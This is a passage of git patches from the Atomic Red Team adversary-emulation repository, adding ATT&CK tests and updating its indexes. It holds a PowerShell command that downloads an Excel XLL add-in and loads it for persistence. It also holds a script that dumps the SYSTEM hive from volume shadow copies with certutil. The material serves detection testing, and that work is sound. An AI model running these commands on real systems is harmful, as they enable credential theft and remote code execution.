"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ac4e52f7..45bbdc86 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -511,6 +511,7 @@ persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index dd997f91..a1f784a4 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -348,6 +348,7 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
 persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
+persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index ec343760..44a94f8d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -868,7 +868,8 @@
   - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
+  - Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
   - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
   - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 1baed247..97ec109c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -622,7 +622,8 @@
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
+  - Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
   - Atomic Test #1: Install AppInit Shim [windows]
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 0c747127..2cd550c4 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -5,7 +5,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index c2efb0a5..b6954e19 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -4,7 +4,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 862d546d..54940482 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -37573,7 +37573,31 @@ persistence:
       x_mitre_platforms:
       - Windows
       - Office 365
-    atomic_tests: []
+      identifier: T1137.006
+    atomic_tests:
+    - name: Code Executed Via Excel Add-in File (Xll)
+      auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3
+      description: "Downloads a XLL file and loads it using the excel add-ins library.\nThis
+        causes excel to display the message \"Hello World\"\nSource of XLL - https://github.com/edparcell/HelloWorldXll
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        xll_url:
+          description: url of the file HelloWorldXll.xll
+          type: url
+          default: https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true
+        local_file:
+          description: name of the xll file
+          type: path
+          default: "$env:tmp\\HelloWorldXll.xll"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX
+          ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))"
+
+'
   T1098.001:
     technique:
       external_references:
diff --git a/atomics/T1137.006/T1137.006.md b/atomics/T1137.006/T1137.006.md
new file mode 100644
index 00000000..06946afe
--- /dev/null
+++ b/atomics/T1137.006/T1137.006.md
@@ -0,0 +1,47 @@
+# T1137.006 - Add-ins
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/006)
+<blockquote>Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
+
+Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Code Executed Via Excel Add-in File (Xll)](#atomic-test-1---code-executed-via-excel-add-in-file-xll)
+
+
+<br/>
+
+## Atomic Test #1 - Code Executed Via Excel Add-in File (Xll)
+Downloads a XLL file and loads it using the excel add-ins library.
+This causes excel to display the message "Hello World"
+Source of XLL - https://github.com/edparcell/HelloWorldXll
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 441b1a0f-a771-428a-8af0-e99e4698cda3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xll_url | url of the file HelloWorldXll.xll | url | https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true|
+| local_file | name of the xll file | path | $env:tmp&#92;HelloWorldXll.xll|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))"
+```
+
+
+
+
+
+
+<br/>

From bd5ae3ad84c42f60329f60b85961003ab7d93ee2 Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Sat, 7 Aug 2021 13:14:14 -0500
Subject: [PATCH 04/39] dump shadow hive w/ certutil (#1594)

---
 atomics/T1003.002/T1003.002.yaml | 31 ++++++++++++++++++++++++++++++-
 1 file changed, 30 insertions(+), 1 deletion(-)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 958fac22..7b563d3e 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -98,4 +98,33 @@ atomic_tests:
       Invoke-PowerDump
     name: powershell
     elevation_required: true
-  
+
+- name: dump volume shadow copy hive with certutil
+  description: |
+    Dump the SAM hive from volume shadow copies with the certutil utility
+    This can be done with a non-admin user account
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_path:
+      description: Path where the hive will be dumped
+      type: Path
+      default: $ENV:temp
+    file_name:
+      description: Name of the dumped hive
+      type: String
+      default: myhive
+  executor:
+    command: |
+      write-host ""
+      $shadowlist = get-wmiobject win32_shadowcopy
+      $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+      $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
+      certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+    name: powershell
+    elevation_required: false 
+    cleanup_command: |
+      write-host ""
+      $toremove = #{file_path} + "\" + '#{file_name}'
+      rm $toremove

From 38cd41e80e38515b98d13cb3dfb24760bb5aa413 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Sat, 7 Aug 2021 18:14:36 +0000
Subject: [PATCH 05/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1003.002/T1003.002.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 7b563d3e..d2efab7b 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -100,6 +100,7 @@ atomic_tests:
     elevation_required: true
 
 - name: dump volume shadow copy hive with certutil
+  auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
   description: |
     Dump the SAM hive from volume shadow copies with the certutil utility
     This can be done with a non-admin user account
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 30af7be8..9cc61f62 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
